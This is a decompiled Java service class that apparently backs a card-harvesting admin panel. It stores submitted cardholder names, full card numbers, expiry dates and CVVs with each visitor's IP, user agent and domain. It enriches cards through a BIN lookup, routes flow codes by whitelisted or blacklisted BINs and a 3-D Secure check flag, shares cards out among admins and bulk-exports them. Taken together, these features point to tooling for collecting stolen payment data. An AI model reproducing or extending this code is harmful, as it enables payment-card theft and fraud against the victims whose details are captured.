package com.mdd.admin.service.impl;

import com.alibaba.fastjson2.JSONObject;
import com.baomidou.mybatisplus.core.conditions.Wrapper;
import com.baomidou.mybatisplus.core.conditions.query.LambdaQueryWrapper;
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;
import com.baomidou.mybatisplus.core.metadata.IPage;
import com.baomidou.mybatisplus.core.toolkit.support.SFunction;
import com.baomidou.mybatisplus.extension.plugins.pagination.Page;
import com.github.yulichang.toolkit.JoinWrappers;
import com.github.yulichang.wrapper.MPJLambdaWrapper;
import com.google.common.collect.Lists;
import com.mdd.admin.LikeAdminThreadLocal;
import com.mdd.admin.cache.RedisCache;
import com.mdd.admin.service.ICardLogService;
import com.mdd.admin.service.IUserConfigService;
import com.mdd.admin.service.IUserOrderService;
import com.mdd.admin.validate.commons.PageValidate;
import com.mdd.admin.validate.log.CardLogSearchValidate;
import com.mdd.admin.validate.log.CardLogUpdateValidate;
import com.mdd.admin.validate.log.ClientCardValidate;
import com.mdd.admin.vo.BindCardListedVo;
import com.mdd.admin.vo.CardLogDetailVo;
import com.mdd.admin.vo.CardLogListedVo;
import com.mdd.common.core.AjaxResult;
import com.mdd.common.core.PageResult;
import com.mdd.common.entity.CardLog;
import com.mdd.common.entity.OrderAdmin;
import com.mdd.common.entity.UserConfig;
import com.mdd.common.entity.UserOrder;
import com.mdd.common.enums.ErrorEnum;
import com.mdd.common.mapper.CardBinMapper;
import com.mdd.common.mapper.CardLogMapper;
import com.mdd.common.mapper.UserConfigMapper;
import com.mdd.common.mapper.UserOrderMapper;
import com.mdd.common.mapper.system.SystemAuthAdminMapper;
import com.mdd.common.util.RequestUtil;
import com.mdd.common.util.StringUtils;
import com.mdd.common.util.TimeUtils;
import java.lang.invoke.SerializedLambda;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import javax.annotation.Resource;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.stereotype.Service;
import org.springframework.util.Assert;

@Service
public class CardLogServiceImpl implements ICardLogService {
   @Resource
   CardLogMapper cardLogMapper;
   @Resource
   CardBinMapper cardBinMapper;
   @Resource
   UserOrderMapper userOrderMapper;
   @Resource
   UserConfigMapper userConfigMapper;
   @Resource
   IUserOrderService orderService;
   @Autowired
   private RedisCache redisCache;
   @Resource
   IUserConfigService userConfigService;
   @Resource
   SystemAuthAdminMapper systemAuthAdminMapper;
   @Value("${like.bin.url}")
   public String binUrl;
   @Value("${like.bin.userId}")
   public String binUserId;
   @Value("${like.bin.apiKey}")
   public String binApiKey;

   public PageResult<CardLogListedVo> list(PageValidate pageValidate, CardLogSearchValidate searchValidate) {
      Integer page = pageValidate.getPageNo();
      Integer limit = pageValidate.getPageSize();
      List<Integer> roleIds = LikeAdminThreadLocal.getRoleIds();
      QueryWrapper<CardLog> queryWrapper = new QueryWrapper();
      queryWrapper.orderByDesc("id");
      this.cardLogMapper.setSearch(queryWrapper, searchValidate, new String[]{"in:orderIds@order_id:int", "=:orderId@order_id:int", "=:sessionId@session_id:str", "=:holder:str", "=:number:str", "=:expiry:str", "=:cvv:str", "=:type:str", "=:types:str", "=:level:str", "=:bank:str", "=:brand:str", "=:state:str", "=:status:int", "=:remark:int", "=:userId@user_id:int", "=:adminId@admin_id:int"});
      IPage<CardLog> iPage = this.cardLogMapper.selectPage(new Page((long)page, (long)limit), queryWrapper);
      List<CardLogListedVo> list = new LinkedList();

      CardLogListedVo vo;
      for(Iterator var9 = iPage.getRecords().iterator(); var9.hasNext(); list.add(vo)) {
         CardLog item = (CardLog)var9.next();
         vo = new CardLogListedVo();
         BeanUtils.copyProperties(item, vo);
         vo.setCreateTime(TimeUtils.timestampToDate(item.getCreateTime()));
         vo.setUpdateTime(TimeUtils.timestampToDate(item.getUpdateTime()));
         if (roleIds.contains(2)) {
            vo.setInfoHide();
         }
      }

      return PageResult.iPageHandle(iPage.getTotal(), iPage.getCurrent(), iPage.getSize(), list);
   }

   private void setSearchParams(MPJLambdaWrapper<CardLog> wrapper, CardLogSearchValidate searchValidate, Boolean selectOrder, Boolean isCount) {
      if (!isCount) {
         wrapper.selectAll(CardLog.class);
      }

      if (selectOrder) {
         wrapper.select(new SFunction[]{UserOrder::getId, UserOrder::getCountry, UserOrder::getProductData, UserOrder::getUserData, UserOrder::getIp, UserOrder::getDomain, UserOrder::getBrowser, UserOrder::getUserAgent});
      }

      wrapper.leftJoin(UserOrder.class, UserOrder::getId, CardLog::getOrderId);
      wrapper.orderByDesc(CardLog::getId);
      wrapper.in(CardLog::getRemark, new Object[]{1});
      if (LikeAdminThreadLocal.getRoleIds().contains(1)) {
         wrapper.leftJoin(OrderAdmin.class, OrderAdmin::getOrderId, CardLog::getOrderId);
         if (this.userConfigService.viewNoSplit()) {
            wrapper.and((tmp) -> {
               MPJLambdaWrapper var10000 = (MPJLambdaWrapper)((MPJLambdaWrapper)((MPJLambdaWrapper)tmp.eq(OrderAdmin::getAdminId, LikeAdminThreadLocal.getAdminId())).or()).isNull(UserOrder::getViewIds);
            });
         } else {
            wrapper.eq(OrderAdmin::getAdminId, LikeAdminThreadLocal.getAdminId());
         }
      }

      if (StringUtils.isNotEmpty(searchValidate.getDomain())) {
         wrapper.ge(UserOrder::getDomain, searchValidate.getDomain());
      }

      if (StringUtils.isNotEmpty(searchValidate.getStartTime())) {
         wrapper.ge(CardLog::getCreateTime, TimeUtils.dateToTimestamp(searchValidate.getStartTime()));
      }

      if (StringUtils.isNotEmpty(searchValidate.getEndTime())) {
         wrapper.le(CardLog::getCreateTime, TimeUtils.dateToTimestamp(searchValidate.getEndTime()));
      }

   }

   public PageResult<BindCardListedVo> bindList(PageValidate pageValidate, CardLogSearchValidate searchValidate) {
      Integer page = pageValidate.getPageNo();
      Integer limit = pageValidate.getPageSize();
      MPJLambdaWrapper<CardLog> wrapper = JoinWrappers.lambda(CardLog.class);
      this.setSearchParams(wrapper, searchValidate, Boolean.TRUE, Boolean.FALSE);
      IPage<BindCardListedVo> iPage = this.cardLogMapper.selectJoinPage(new Page((long)page, (long)limit), BindCardListedVo.class, wrapper);
      List<BindCardListedVo> list = new LinkedList();
      Iterator var8 = iPage.getRecords().iterator();

      while(var8.hasNext()) {
         BindCardListedVo item = (BindCardListedVo)var8.next();
         BindCardListedVo vo = new BindCardListedVo();
         BeanUtils.copyProperties(item, vo);
         vo.setCreateTime(TimeUtils.timestampToDate(item.getCreateTime()));
         vo.setUpdateTime(TimeUtils.timestampToDate(item.getUpdateTime()));
         list.add(vo);
      }

      return PageResult.iPageHandle(iPage.getTotal(), iPage.getCurrent(), iPage.getSize(), list);
   }

   public CardLogDetailVo detail(Integer id) {
      CardLog model = (CardLog)this.cardLogMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", id)).last("limit 1"));
      Assert.notNull(model, "数据不存在");
      CardLogDetailVo vo = new CardLogDetailVo();
      BeanUtils.copyProperties(model, vo);
      return vo;
   }

   public AjaxResult<?> add(ClientCardValidate cardValidate, UserOrder order) {
      this.redisCache.deleteObject("card_cache_" + order.getFloodId());
      this.redisCache.deleteObject("option_cache_" + order.getFloodId());
      CardLog model = new CardLog();
      model.setOrderId(order.getId());
      model.setDomain(order.getDomain());
      model.setFloodId(order.getFloodId());
      model.setSessionId(cardValidate.getSessionId());
      model.setHolder(cardValidate.getHolder());
      model.setNumber(cardValidate.getNumber());
      model.setExpiry(cardValidate.getExpiry());
      model.setCvv(cardValidate.getCvv());
      model.setType(cardValidate.getType());
      long time = System.currentTimeMillis();
      this.updateCardBin(model, 1);
      System.out.println("获取卡头耗时：" + (System.currentTimeMillis() - time) + "ms");
      model.setStatus(0);
      model.setRemark(0);
      model.setUserId(order.getUserId());
      model.setAdminId(order.getAdminId());
      model.setCreateTime(System.currentTimeMillis() / 1000L);
      model.setUpdateTime(System.currentTimeMillis() / 1000L);
      this.cardLogMapper.insert(model);
      UserOrder up = new UserOrder();
      up.setId(order.getId());
      up.setFloodId(order.getFloodId());
      up.setCardId(model.getId());
      up.setCardNum(model.getNumber());
      up.setStatus(1);
      up.setProgress(cardValidate.getProgress());
      if (StringUtils.isNotEmpty(cardValidate.getUserData()) && !cardValidate.getUserData().equals("{}")) {
         up.setUserData(cardValidate.getUserData());
      }

      AjaxResult<?> result = this.passOrReject(cardValidate, order, model.getTypes());
      if (Objects.equals(result.getData(), "101")) {
         up.setProgress(4005);
      } else if (Objects.equals(result.getData(), "100")) {
         up.setStatus(2);
         up.setProgress(9101);
      }

      this.orderService.updateById(up);
      if (Objects.equals(order.getSplit(), 1) && StringUtils.isNotEmpty(order.getViewIds())) {
         Integer adminId = Integer.parseInt(order.getViewIds().split(",")[0]);
         this.systemAuthAdminMapper.addSplitNum("card_num", adminId);
         LambdaQueryWrapper<CardLog> query = new LambdaQueryWrapper();
         query.eq(CardLog::getNumber, cardValidate.getNumber());
         if (this.cardLogMapper.selectCount(query) == 1L) {
            this.systemAuthAdminMapper.addSplitNum("card_only", adminId);
         }
      }

      return result;
   }

   public void updateCardBin(CardLog model, Integer num) {
      try {
         if (num > 5) {
            return;
         }

         num = num + 1;
         Map<String, String> params = new HashMap();
         params.put("bin-number", model.getNumber().trim().substring(0, 8));
         Map<String, String> header = new HashMap();
         header.put("User-ID", this.binUserId);
         header.put("API-Key", this.binApiKey);
         String res = (new RequestUtil()).doGet(this.binUrl, params, header);
         if (StringUtils.isEmpty(res)) {
            this.updateCardBin(model, num);
            return;
         }

         JSONObject json;
         try {
            json = JSONObject.parseObject(res);
         } catch (Exception var8) {
            this.updateCardBin(model, num);
            return;
         }

         if (json.isEmpty()) {
            this.updateCardBin(model, num);
            return;
         }

         model.setBrand(json.getString("card-brand"));
         model.setTypes(json.getString("card-type"));
         model.setLevel(json.getString("card-category"));
         model.setState(json.getString("country-code"));
         model.setCurrency(json.getString("currency-code"));
         model.setBank(json.getString("issuer"));
         model.setBankWebsite(json.getString("issuer-website"));
         model.setBankPhone(json.getString("issuer-phone"));
         model.setCommercial(json.getString("is-commercial"));
         model.setPrepaid(json.getString("is-prepaid"));
      } catch (Exception var9) {
      }

   }

   private AjaxResult<?> passOrReject(ClientCardValidate cardValidate, UserOrder order, String cardType) {
      UserConfig config = this.userConfigService.selectSystemConfig();
      if (config == null) {
         return AjaxResult.success();
      } else {
         JSONObject json = JSONObject.parseObject(config.getValue());
         JSONObject baseSettings = json.getJSONObject("baseSettings");
         if (baseSettings == null) {
            baseSettings = new JSONObject();
         }

         String number = cardValidate.getNumber();
         String whitelisting = baseSettings.getString("whitelisting");
         Stream var10000;
         if (StringUtils.isNotEmpty(whitelisting)) {
            var10000 = Arrays.stream(whitelisting.split(","));
            number.getClass();
            if (var10000.anyMatch(number::startsWith)) {
               return AjaxResult.success(ErrorEnum.SUCCESS.getMsg(), "100");
            }
         }

         String blacklists = baseSettings.getString("blacklists");
         if (StringUtils.isNotEmpty(blacklists)) {
            var10000 = Arrays.stream(blacklists.split(","));
            number.getClass();
            if (var10000.anyMatch(number::startsWith)) {
               return AjaxResult.success(ErrorEnum.SUCCESS.getMsg(), "101");
            }
         }

         if (StringUtils.isNotEmpty(cardType)) {
            Boolean rejectionC = baseSettings.getBoolean("rejectionC");
            Boolean rejectionD = baseSettings.getBoolean("rejectionD");
            if (rejectionC != null && rejectionC && cardType.equals("CREDIT")) {
               return AjaxResult.success(ErrorEnum.SUCCESS.getMsg(), "101");
            }

            if (rejectionD != null && rejectionD && cardType.equals("DEBIT")) {
               return AjaxResult.success(ErrorEnum.SUCCESS.getMsg(), "101");
            }
         }

         LambdaQueryWrapper<UserConfig> query = (LambdaQueryWrapper)((LambdaQueryWrapper)(new LambdaQueryWrapper()).eq(UserConfig::getDomain, order.getDomain())).eq(UserConfig::getType, 1);
         UserConfig model = (UserConfig)this.userConfigMapper.selectOne((Wrapper)query.last("order by config_id desc limit 1"));
         if (model == null) {
            return AjaxResult.failed("no client config");
         } else {
            JSONObject back = JSONObject.parseObject(model.getValue()).getJSONObject("background");
            if (back != null) {
               String check3d = back.getString("3d_check");
               if (StringUtils.isNotEmpty(check3d) && check3d.equals("0")) {
                  return AjaxResult.success(ErrorEnum.SUCCESS.getMsg(), "100");
               }
            }

            return AjaxResult.success();
         }
      }
   }

   public void edit(CardLogUpdateValidate updateValidate) {
      CardLog model = (CardLog)this.cardLogMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", updateValidate.getId())).last("limit 1"));
      Assert.notNull(model, "数据不存在!");
      model.setId(updateValidate.getId());
      model.setOrderId(updateValidate.getOrderId());
      model.setSessionId(updateValidate.getSessionId());
      model.setHolder(updateValidate.getHolder());
      model.setNumber(updateValidate.getNumber());
      model.setExpiry(updateValidate.getExpiry());
      model.setCvv(updateValidate.getCvv());
      model.setType(updateValidate.getType());
      model.setTypes(updateValidate.getTypes());
      model.setLevel(updateValidate.getLevel());
      model.setBank(updateValidate.getBank());
      model.setBrand(updateValidate.getBrand());
      model.setState(updateValidate.getState());
      model.setStatus(updateValidate.getStatus());
      model.setRemark(updateValidate.getRemark());
      model.setUserId(updateValidate.getUserId());
      model.setAdminId(updateValidate.getAdminId());
      model.setUpdateTime(System.currentTimeMillis() / 1000L);
      this.cardLogMapper.updateById(model);
   }

   public void del(Integer id) {
      CardLog model = (CardLog)this.cardLogMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", id)).last("limit 1"));
      Assert.notNull(model, "数据不存在!");
      this.cardLogMapper.delete((Wrapper)(new QueryWrapper()).eq("id", id));
   }

   public void delAll() {
      this.cardLogMapper.delete(new QueryWrapper());
   }

   public AjaxResult<?> export(CardLogSearchValidate searchValidate) {
      List<CardLog> cards = this.queryAllCardByPage(searchValidate, 2000);
      List<Integer> orderIds = (List)cards.stream().map(CardLog::getOrderId).distinct().collect(Collectors.toList());
      List<UserOrder> orders = this.queryAllOrdersByPage(orderIds, 500);
      return this.orderService.exportBuild(orders, cards, searchValidate.getDuplicate(), searchValidate.getExportType());
   }

   public List<UserOrder> queryAllOrdersByPage(List<Integer> orderIds, int pageSize) {
      List<UserOrder> allOrders = new ArrayList();
      List<List<Integer>> lists = Lists.partition(orderIds, pageSize);
      Iterator var5 = lists.iterator();

      while(var5.hasNext()) {
         List<Integer> ids = (List)var5.next();
         List<UserOrder> list = this.userOrderMapper.selectList((Wrapper)(new QueryWrapper()).in("id", ids));
         allOrders.addAll(list);
      }

      return allOrders;
   }

   public List<CardLog> queryAllCardByPage(CardLogSearchValidate searchValidate, int pageSize) {
      List<CardLog> allOrders = new ArrayList();
      int pageNum = 1;
      MPJLambdaWrapper<CardLog> wrapper = JoinWrappers.lambda(CardLog.class);
      this.setSearchParams(wrapper, searchValidate, Boolean.FALSE, Boolean.TRUE);
      long total = this.cardLogMapper.selectJoinCount(wrapper);
      int totalPages = (int)Math.ceil((double)total / (double)pageSize);
      MPJLambdaWrapper<CardLog> queryWrapper = JoinWrappers.lambda(CardLog.class);
      this.setSearchParams(queryWrapper, searchValidate, Boolean.FALSE, Boolean.FALSE);

      for(int i = 0; i < totalPages; ++i) {
         IPage<CardLog> iPage = this.cardLogMapper.selectJoinPage(new Page((long)(pageNum++), (long)pageSize), CardLog.class, queryWrapper);
         allOrders.addAll(iPage.getRecords());
      }

      return allOrders;
   }

   // $FF: synthetic method
   private static Object $deserializeLambda$(SerializedLambda lambda) {
      switch (lambda.getImplMethodName()) {
         case "getViewIds":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getViewIds;
            }
            break;
         case "getCreateTime":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Long;")) {
               return CardLog::getCreateTime;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Long;")) {
               return CardLog::getCreateTime;
            }
            break;
         case "getCountry":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getCountry;
            }
            break;
         case "getProductData":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getProductData;
            }
            break;
         case "getIp":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getIp;
            }
            break;
         case "getOrderId":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getOrderId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/OrderAdmin") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return OrderAdmin::getOrderId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getOrderId;
            }
            break;
         case "getId":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return UserOrder::getId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return UserOrder::getId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getId;
            }
            break;
         case "getAdminId":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/OrderAdmin") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return OrderAdmin::getAdminId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/OrderAdmin") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return OrderAdmin::getAdminId;
            }
            break;
         case "getDomain":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getDomain;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getDomain;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserConfig") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserConfig::getDomain;
            }
            break;
         case "getNumber":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return CardLog::getNumber;
            }
            break;
         case "getType":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserConfig") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return UserConfig::getType;
            }
            break;
         case "getRemark":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getRemark;
            }
            break;
         case "getUserAgent":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getUserAgent;
            }
            break;
         case "getUserData":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getUserData;
            }
            break;
         case "getBrowser":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getBrowser;
            }
      }

      throw new IllegalArgumentException("Invalid lambda deserialization");
   }
}
